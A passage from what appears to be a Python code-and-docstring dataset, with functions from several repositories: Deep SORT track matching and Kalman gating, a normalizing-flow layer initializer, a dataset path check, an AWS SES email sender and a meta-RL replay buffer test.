enumerate(detection_indices): if (col not in col_indices): unmatched_detections.append(detection_idx) for (row, track_idx) in enumerate(track_indices): if (row not in row_indices): unmatched_tracks.append(track_idx) for (row, col) in zip(row_indices, col_indices): track_idx = track_indices[row] detection_idx = detection_indices[col] if (cost_matrix[(row, col)] > max_distance): unmatched_tracks.append(track_idx) unmatched_detections.append(detection_idx) else: matches.append((track_idx, detection_idx)) return (matches, unmatched_tracks, unmatched_detections)<|docstring|>Solve linear assignment problem. Parameters ---------- distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray The distance metric is given a list of tracks and detections as well as a list of N track indices and M detection indices. The metric should return the NxM dimensional cost matrix, where element (i, j) is the association cost between the i-th track in the given track indices and the j-th detection in the given detection_indices. max_distance : float Gating threshold. Associations with cost larger than this value are disregarded. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : List[int] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). detection_indices : List[int] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). Returns ------- (List[(int, int)], List[int], List[int]) Returns a tuple with the following three entries: * A list of matched track and detection indices. * A list of unmatched track indices. * A list of unmatched detection indices.<|endoftext|>
2ded0bd0e907be1734a3d33fefe7d3a89c05328748da1ae8992c588088e68c45
def matching_cascade(distance_metric, max_distance, cascade_depth, tracks, detections, track_indices=None, detection_indices=None): 'Run matching cascade.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n cascade_depth: int\n The cascade depth, should be se to the maximum track age.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : Optional[List[int]]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above). Defaults to all tracks.\n detection_indices : Optional[List[int]]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above). 
Defaults to all\n detections.\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = list(range(len(tracks))) if (detection_indices is None): detection_indices = list(range(len(detections))) unmatched_detections = detection_indices matches = [] for level in range(cascade_depth): if (len(unmatched_detections) == 0): break track_indices_l = [k for k in track_indices if (tracks[k].time_since_update == (1 + level))] if (len(track_indices_l) == 0): continue (matches_l, _, unmatched_detections) = min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices_l, unmatched_detections) matches += matches_l unmatched_tracks = list((set(track_indices) - set((k for (k, _) in matches)))) return (matches, unmatched_tracks, unmatched_detections)
Run matching cascade. Parameters ---------- distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray The distance metric is given a list of tracks and detections as well as a list of N track indices and M detection indices. The metric should return the NxM dimensional cost matrix, where element (i, j) is the association cost between the i-th track in the given track indices and the j-th detection in the given detection indices. max_distance : float Gating threshold. Associations with cost larger than this value are disregarded. cascade_depth: int The cascade depth, should be se to the maximum track age. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : Optional[List[int]] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). Defaults to all tracks. detection_indices : Optional[List[int]] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). Defaults to all detections. Returns ------- (List[(int, int)], List[int], List[int]) Returns a tuple with the following three entries: * A list of matched track and detection indices. * A list of unmatched track indices. * A list of unmatched detection indices.
deep_sort_pytorch/deep_sort/sort/linear_assignment.py
matching_cascade
JisuHann/Autonomous-Driving-Cart-MEME
2,175
python
def matching_cascade(distance_metric, max_distance, cascade_depth, tracks, detections, track_indices=None, detection_indices=None): 'Run matching cascade.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n cascade_depth: int\n The cascade depth, should be se to the maximum track age.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : Optional[List[int]]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above). Defaults to all tracks.\n detection_indices : Optional[List[int]]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above). 
Defaults to all\n detections.\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = list(range(len(tracks))) if (detection_indices is None): detection_indices = list(range(len(detections))) unmatched_detections = detection_indices matches = [] for level in range(cascade_depth): if (len(unmatched_detections) == 0): break track_indices_l = [k for k in track_indices if (tracks[k].time_since_update == (1 + level))] if (len(track_indices_l) == 0): continue (matches_l, _, unmatched_detections) = min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices_l, unmatched_detections) matches += matches_l unmatched_tracks = list((set(track_indices) - set((k for (k, _) in matches)))) return (matches, unmatched_tracks, unmatched_detections)
def matching_cascade(distance_metric, max_distance, cascade_depth, tracks, detections, track_indices=None, detection_indices=None): 'Run matching cascade.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n cascade_depth: int\n The cascade depth, should be se to the maximum track age.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : Optional[List[int]]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above). Defaults to all tracks.\n detection_indices : Optional[List[int]]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above). 
Defaults to all\n detections.\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = list(range(len(tracks))) if (detection_indices is None): detection_indices = list(range(len(detections))) unmatched_detections = detection_indices matches = [] for level in range(cascade_depth): if (len(unmatched_detections) == 0): break track_indices_l = [k for k in track_indices if (tracks[k].time_since_update == (1 + level))] if (len(track_indices_l) == 0): continue (matches_l, _, unmatched_detections) = min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices_l, unmatched_detections) matches += matches_l unmatched_tracks = list((set(track_indices) - set((k for (k, _) in matches)))) return (matches, unmatched_tracks, unmatched_detections)<|docstring|>Run matching cascade. Parameters ---------- distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray The distance metric is given a list of tracks and detections as well as a list of N track indices and M detection indices. The metric should return the NxM dimensional cost matrix, where element (i, j) is the association cost between the i-th track in the given track indices and the j-th detection in the given detection indices. max_distance : float Gating threshold. Associations with cost larger than this value are disregarded. cascade_depth: int The cascade depth, should be se to the maximum track age. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : Optional[List[int]] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). Defaults to all tracks. 
detection_indices : Optional[List[int]] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). Defaults to all detections. Returns ------- (List[(int, int)], List[int], List[int]) Returns a tuple with the following three entries: * A list of matched track and detection indices. * A list of unmatched track indices. * A list of unmatched detection indices.<|endoftext|>
eb53b89e3a8a32a82613225bf3acf4a4802a96da476e21831b3f96ae47fba1b0
def gate_cost_matrix(kf, cost_matrix, tracks, detections, track_indices, detection_indices, gated_cost=INFTY_COST, only_position=False): 'Invalidate infeasible entries in cost matrix based on the state\n distributions obtained by Kalman filtering.\n\n Parameters\n ----------\n kf : The Kalman filter.\n cost_matrix : ndarray\n The NxM dimensional cost matrix, where N is the number of track indices\n and M is the number of detection indices, such that entry (i, j) is the\n association cost between `tracks[track_indices[i]]` and\n `detections[detection_indices[j]]`.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n gated_cost : Optional[float]\n Entries in the cost matrix corresponding to infeasible associations are\n set this value. Defaults to a very large value.\n only_position : Optional[bool]\n If True, only the x, y position of the state distribution is considered\n during gating. Defaults to False.\n\n Returns\n -------\n ndarray\n Returns the modified cost matrix.\n\n ' gating_dim = (2 if only_position else 4) gating_threshold = kalman_filter.chi2inv95[gating_dim] measurements = np.asarray([detections[i].to_xyah() for i in detection_indices]) for (row, track_idx) in enumerate(track_indices): track = tracks[track_idx] gating_distance = kf.gating_distance(track.mean, track.covariance, measurements, only_position) cost_matrix[(row, (gating_distance > gating_threshold))] = gated_cost return cost_matrix
Invalidate infeasible entries in cost matrix based on the state distributions obtained by Kalman filtering. Parameters ---------- kf : The Kalman filter. cost_matrix : ndarray The NxM dimensional cost matrix, where N is the number of track indices and M is the number of detection indices, such that entry (i, j) is the association cost between `tracks[track_indices[i]]` and `detections[detection_indices[j]]`. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : List[int] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). detection_indices : List[int] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). gated_cost : Optional[float] Entries in the cost matrix corresponding to infeasible associations are set this value. Defaults to a very large value. only_position : Optional[bool] If True, only the x, y position of the state distribution is considered during gating. Defaults to False. Returns ------- ndarray Returns the modified cost matrix.
deep_sort_pytorch/deep_sort/sort/linear_assignment.py
gate_cost_matrix
JisuHann/Autonomous-Driving-Cart-MEME
2,175
python
def gate_cost_matrix(kf, cost_matrix, tracks, detections, track_indices, detection_indices, gated_cost=INFTY_COST, only_position=False): 'Invalidate infeasible entries in cost matrix based on the state\n distributions obtained by Kalman filtering.\n\n Parameters\n ----------\n kf : The Kalman filter.\n cost_matrix : ndarray\n The NxM dimensional cost matrix, where N is the number of track indices\n and M is the number of detection indices, such that entry (i, j) is the\n association cost between `tracks[track_indices[i]]` and\n `detections[detection_indices[j]]`.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n gated_cost : Optional[float]\n Entries in the cost matrix corresponding to infeasible associations are\n set this value. Defaults to a very large value.\n only_position : Optional[bool]\n If True, only the x, y position of the state distribution is considered\n during gating. Defaults to False.\n\n Returns\n -------\n ndarray\n Returns the modified cost matrix.\n\n ' gating_dim = (2 if only_position else 4) gating_threshold = kalman_filter.chi2inv95[gating_dim] measurements = np.asarray([detections[i].to_xyah() for i in detection_indices]) for (row, track_idx) in enumerate(track_indices): track = tracks[track_idx] gating_distance = kf.gating_distance(track.mean, track.covariance, measurements, only_position) cost_matrix[(row, (gating_distance > gating_threshold))] = gated_cost return cost_matrix
def gate_cost_matrix(kf, cost_matrix, tracks, detections, track_indices, detection_indices, gated_cost=INFTY_COST, only_position=False): 'Invalidate infeasible entries in cost matrix based on the state\n distributions obtained by Kalman filtering.\n\n Parameters\n ----------\n kf : The Kalman filter.\n cost_matrix : ndarray\n The NxM dimensional cost matrix, where N is the number of track indices\n and M is the number of detection indices, such that entry (i, j) is the\n association cost between `tracks[track_indices[i]]` and\n `detections[detection_indices[j]]`.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n gated_cost : Optional[float]\n Entries in the cost matrix corresponding to infeasible associations are\n set this value. Defaults to a very large value.\n only_position : Optional[bool]\n If True, only the x, y position of the state distribution is considered\n during gating. Defaults to False.\n\n Returns\n -------\n ndarray\n Returns the modified cost matrix.\n\n ' gating_dim = (2 if only_position else 4) gating_threshold = kalman_filter.chi2inv95[gating_dim] measurements = np.asarray([detections[i].to_xyah() for i in detection_indices]) for (row, track_idx) in enumerate(track_indices): track = tracks[track_idx] gating_distance = kf.gating_distance(track.mean, track.covariance, measurements, only_position) cost_matrix[(row, (gating_distance > gating_threshold))] = gated_cost return cost_matrix<|docstring|>Invalidate infeasible entries in cost matrix based on the state distributions obtained by Kalman filtering. 
Parameters ---------- kf : The Kalman filter. cost_matrix : ndarray The NxM dimensional cost matrix, where N is the number of track indices and M is the number of detection indices, such that entry (i, j) is the association cost between `tracks[track_indices[i]]` and `detections[detection_indices[j]]`. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : List[int] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). detection_indices : List[int] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). gated_cost : Optional[float] Entries in the cost matrix corresponding to infeasible associations are set this value. Defaults to a very large value. only_position : Optional[bool] If True, only the x, y position of the state distribution is considered during gating. Defaults to False. Returns ------- ndarray Returns the modified cost matrix.<|endoftext|>
cd3afe169ca41f73763ea098462af4eee48dbf186d781fc35e4a0c1cd0134c5e
def __init__(self, dimension, num_transforms=3, num_householder_iter=(- 1), use_permanent_parameters=False, model_offset=0, exact_mode=True): '\n Modified version of official implementation in https:/github .. fixes numerical issues with bisection inversion due to more efficient newton iterations, added offsets, and allows \n to use reparametrization trick for VAEs due to Newton iterations\n ' super().__init__(dimension=dimension, use_permanent_parameters=use_permanent_parameters, model_offset=model_offset) if (num_householder_iter == (- 1)): self.householder_iter = dimension else: self.householder_iter = num_householder_iter self.use_householder = True if (self.householder_iter == 0): self.use_householder = False self.dimension = dimension self.num_transforms = num_transforms self.width_min = 0.1 self.exp_min = 0.1 self.exact_mode = exact_mode self.num_params_per_item = (num_transforms * self.dimension) self.total_transform_params = (self.num_params_per_item * 5) init_log_value = (- 0.1053605156) if use_permanent_parameters: self.log_widths1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.log_widths2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) 
if use_permanent_parameters: self.log_exponent = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_exponent = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) self.num_householder_params = 0 if self.use_householder: if use_permanent_parameters: self.vs = nn.Parameter(torch.randn(self.householder_iter, dimension).type(torch.double).unsqueeze(0)) else: self.vs = torch.zeros(self.householder_iter, dimension).type(torch.double).unsqueeze(0) self.num_householder_params = (self.householder_iter * self.dimension) self.total_param_num += (self.total_transform_params + self.num_householder_params)
Modified version of official implementation in https:/github .. fixes numerical issues with bisection inversion due to more efficient newton iterations, added offsets, and allows to use reparametrization trick for VAEs due to Newton iterations
jammy_flows/layers/euclidean/polynomial_stretch_flow.py
__init__
thoglu/jammy_flows
8
python
def __init__(self, dimension, num_transforms=3, num_householder_iter=(- 1), use_permanent_parameters=False, model_offset=0, exact_mode=True): '\n Modified version of official implementation in https:/github .. fixes numerical issues with bisection inversion due to more efficient newton iterations, added offsets, and allows \n to use reparametrization trick for VAEs due to Newton iterations\n ' super().__init__(dimension=dimension, use_permanent_parameters=use_permanent_parameters, model_offset=model_offset) if (num_householder_iter == (- 1)): self.householder_iter = dimension else: self.householder_iter = num_householder_iter self.use_householder = True if (self.householder_iter == 0): self.use_householder = False self.dimension = dimension self.num_transforms = num_transforms self.width_min = 0.1 self.exp_min = 0.1 self.exact_mode = exact_mode self.num_params_per_item = (num_transforms * self.dimension) self.total_transform_params = (self.num_params_per_item * 5) init_log_value = (- 0.1053605156) if use_permanent_parameters: self.log_widths1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.log_widths2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) 
if use_permanent_parameters: self.log_exponent = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_exponent = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) self.num_householder_params = 0 if self.use_householder: if use_permanent_parameters: self.vs = nn.Parameter(torch.randn(self.householder_iter, dimension).type(torch.double).unsqueeze(0)) else: self.vs = torch.zeros(self.householder_iter, dimension).type(torch.double).unsqueeze(0) self.num_householder_params = (self.householder_iter * self.dimension) self.total_param_num += (self.total_transform_params + self.num_householder_params)
def __init__(self, dimension, num_transforms=3, num_householder_iter=(- 1), use_permanent_parameters=False, model_offset=0, exact_mode=True): '\n Modified version of official implementation in https:/github .. fixes numerical issues with bisection inversion due to more efficient newton iterations, added offsets, and allows \n to use reparametrization trick for VAEs due to Newton iterations\n ' super().__init__(dimension=dimension, use_permanent_parameters=use_permanent_parameters, model_offset=model_offset) if (num_householder_iter == (- 1)): self.householder_iter = dimension else: self.householder_iter = num_householder_iter self.use_householder = True if (self.householder_iter == 0): self.use_householder = False self.dimension = dimension self.num_transforms = num_transforms self.width_min = 0.1 self.exp_min = 0.1 self.exact_mode = exact_mode self.num_params_per_item = (num_transforms * self.dimension) self.total_transform_params = (self.num_params_per_item * 5) init_log_value = (- 0.1053605156) if use_permanent_parameters: self.log_widths1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.log_widths2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) 
if use_permanent_parameters: self.log_exponent = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_exponent = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) self.num_householder_params = 0 if self.use_householder: if use_permanent_parameters: self.vs = nn.Parameter(torch.randn(self.householder_iter, dimension).type(torch.double).unsqueeze(0)) else: self.vs = torch.zeros(self.householder_iter, dimension).type(torch.double).unsqueeze(0) self.num_householder_params = (self.householder_iter * self.dimension) self.total_param_num += (self.total_transform_params + self.num_householder_params)<|docstring|>Modified version of official implementation in https:/github .. fixes numerical issues with bisection inversion due to more efficient newton iterations, added offsets, and allows to use reparametrization trick for VAEs due to Newton iterations<|endoftext|>
ef6993cf9fc2dd9ddfebca35d1344efa9ed0071090f87e8ab8b560b3a630f5e2
def _check_before_run(self): 'Check if all files are available before going deeper' if (not osp.exists(self.dataset_dir)): raise RuntimeError("'{}' is not available".format(self.dataset_dir)) if (not osp.exists(self.train_dir)): raise RuntimeError("'{}' is not available".format(self.train_dir)) if (not osp.exists(self.test_dir)): raise RuntimeError("'{}' is not available".format(self.test_dir))
Check if all files are available before going deeper
datasets/msmt17.py
_check_before_run
gutengzczy/TransReID
297
python
def _check_before_run(self): if (not osp.exists(self.dataset_dir)): raise RuntimeError("'{}' is not available".format(self.dataset_dir)) if (not osp.exists(self.train_dir)): raise RuntimeError("'{}' is not available".format(self.train_dir)) if (not osp.exists(self.test_dir)): raise RuntimeError("'{}' is not available".format(self.test_dir))
def _check_before_run(self): if (not osp.exists(self.dataset_dir)): raise RuntimeError("'{}' is not available".format(self.dataset_dir)) if (not osp.exists(self.train_dir)): raise RuntimeError("'{}' is not available".format(self.train_dir)) if (not osp.exists(self.test_dir)): raise RuntimeError("'{}' is not available".format(self.test_dir))<|docstring|>Check if all files are available before going deeper<|endoftext|>
7683a69b9790b86437877c8fd3cca8afba5928ffcfbcb5a160ed357ef7ce2b7f
def send_email(self, subject: str, message: str, dest_address: str, tmp_file_attachment_name: str=''): "The send_email method. This method attempts to send an email when it is called.\n\n :param subject: the subject line of the email\n :param message: the body of the email\n :param dest_address: the address to which the email should be sent\n :param tmp_file_attachment_name: (optional) a file located in /tmp which should be attached to the email\n :return: response from Amazon's SES API\n " msg = MIMEMultipart('alternative') msg['Subject'] = subject msg['From'] = self._sender msg['To'] = dest_address body_text = self._plain_to_text_email(message) body_html = self._plain_to_html_email(message) text_part = MIMEText(body_text.encode(self._charset), 'plain', self._charset) html_part = MIMEText(body_html.encode(self._charset), 'html', self._charset) msg.attach(text_part) msg.attach(html_part) if tmp_file_attachment_name: part = MIMEApplication(open(f'/tmp/{tmp_file_attachment_name}', 'rb').read()) part.add_header('Content-Disposition', 'attachment', filename=tmp_file_attachment_name) msg.attach(part) response = self._client.send_raw_email(Source=msg['From'], Destinations=[msg['To']], RawMessage={'Data': msg.as_string()}) return response
The send_email method. This method attempts to send an email when it is called. :param subject: the subject line of the email :param message: the body of the email :param dest_address: the address to which the email should be sent :param tmp_file_attachment_name: (optional) a file located in /tmp which should be attached to the email :return: response from Amazon's SES API
python/ecs/ecs_email_client.py
send_email
ECS-Rocks/EcsPythonModule
0
python
def send_email(self, subject: str, message: str, dest_address: str, tmp_file_attachment_name: str=): "The send_email method. This method attempts to send an email when it is called.\n\n :param subject: the subject line of the email\n :param message: the body of the email\n :param dest_address: the address to which the email should be sent\n :param tmp_file_attachment_name: (optional) a file located in /tmp which should be attached to the email\n :return: response from Amazon's SES API\n " msg = MIMEMultipart('alternative') msg['Subject'] = subject msg['From'] = self._sender msg['To'] = dest_address body_text = self._plain_to_text_email(message) body_html = self._plain_to_html_email(message) text_part = MIMEText(body_text.encode(self._charset), 'plain', self._charset) html_part = MIMEText(body_html.encode(self._charset), 'html', self._charset) msg.attach(text_part) msg.attach(html_part) if tmp_file_attachment_name: part = MIMEApplication(open(f'/tmp/{tmp_file_attachment_name}', 'rb').read()) part.add_header('Content-Disposition', 'attachment', filename=tmp_file_attachment_name) msg.attach(part) response = self._client.send_raw_email(Source=msg['From'], Destinations=[msg['To']], RawMessage={'Data': msg.as_string()}) return response
def send_email(self, subject: str, message: str, dest_address: str, tmp_file_attachment_name: str=): "The send_email method. This method attempts to send an email when it is called.\n\n :param subject: the subject line of the email\n :param message: the body of the email\n :param dest_address: the address to which the email should be sent\n :param tmp_file_attachment_name: (optional) a file located in /tmp which should be attached to the email\n :return: response from Amazon's SES API\n " msg = MIMEMultipart('alternative') msg['Subject'] = subject msg['From'] = self._sender msg['To'] = dest_address body_text = self._plain_to_text_email(message) body_html = self._plain_to_html_email(message) text_part = MIMEText(body_text.encode(self._charset), 'plain', self._charset) html_part = MIMEText(body_html.encode(self._charset), 'html', self._charset) msg.attach(text_part) msg.attach(html_part) if tmp_file_attachment_name: part = MIMEApplication(open(f'/tmp/{tmp_file_attachment_name}', 'rb').read()) part.add_header('Content-Disposition', 'attachment', filename=tmp_file_attachment_name) msg.attach(part) response = self._client.send_raw_email(Source=msg['From'], Destinations=[msg['To']], RawMessage={'Data': msg.as_string()}) return response<|docstring|>The send_email method. This method attempts to send an email when it is called. :param subject: the subject line of the email :param message: the body of the email :param dest_address: the address to which the email should be sent :param tmp_file_attachment_name: (optional) a file located in /tmp which should be attached to the email :return: response from Amazon's SES API<|endoftext|>
70cf9520992499c375f526ce967ec2a543daf61bcbd793a5e0fb5f3edc5cb8d7
def test_all(): 'Test all methods.' env = TfEnv(DummyBoxEnv()) policy = DeterministicMLPPolicy(env_spec=env.spec, hidden_sizes=(32, 32)) max_path_length = 10 max_samples = 50 max_trajs = 50 sampler = PEARLSampler(env, policy, max_path_length) (paths, _) = sampler.obtain_samples(max_samples=max_samples, max_trajs=max_trajs, accum_context=False) replay_buffer = MetaReplayBuffer(100, env.observation_space.low.size, env.action_space.low.size) i = 0 for path in paths: replay_buffer.add_path(path) i += max_path_length assert (replay_buffer.size() == i) replay_buffer.clear() assert (replay_buffer.size() == 0) for path in paths: replay_buffer.add_path(path) batch_size = 3 indices = np.random.randint(0, replay_buffer.size(), batch_size) out = replay_buffer.sample_data(indices) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) batch_size = 10 out = replay_buffer.random_batch(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) out = replay_buffer.random_sequence(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size)
Test all methods.
tests/metarl/replay_buffer/test_meta_replay_buffer.py
test_all
icml2020submission6857/metarl
2
python
def test_all(): env = TfEnv(DummyBoxEnv()) policy = DeterministicMLPPolicy(env_spec=env.spec, hidden_sizes=(32, 32)) max_path_length = 10 max_samples = 50 max_trajs = 50 sampler = PEARLSampler(env, policy, max_path_length) (paths, _) = sampler.obtain_samples(max_samples=max_samples, max_trajs=max_trajs, accum_context=False) replay_buffer = MetaReplayBuffer(100, env.observation_space.low.size, env.action_space.low.size) i = 0 for path in paths: replay_buffer.add_path(path) i += max_path_length assert (replay_buffer.size() == i) replay_buffer.clear() assert (replay_buffer.size() == 0) for path in paths: replay_buffer.add_path(path) batch_size = 3 indices = np.random.randint(0, replay_buffer.size(), batch_size) out = replay_buffer.sample_data(indices) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) batch_size = 10 out = replay_buffer.random_batch(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) out = replay_buffer.random_sequence(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size)
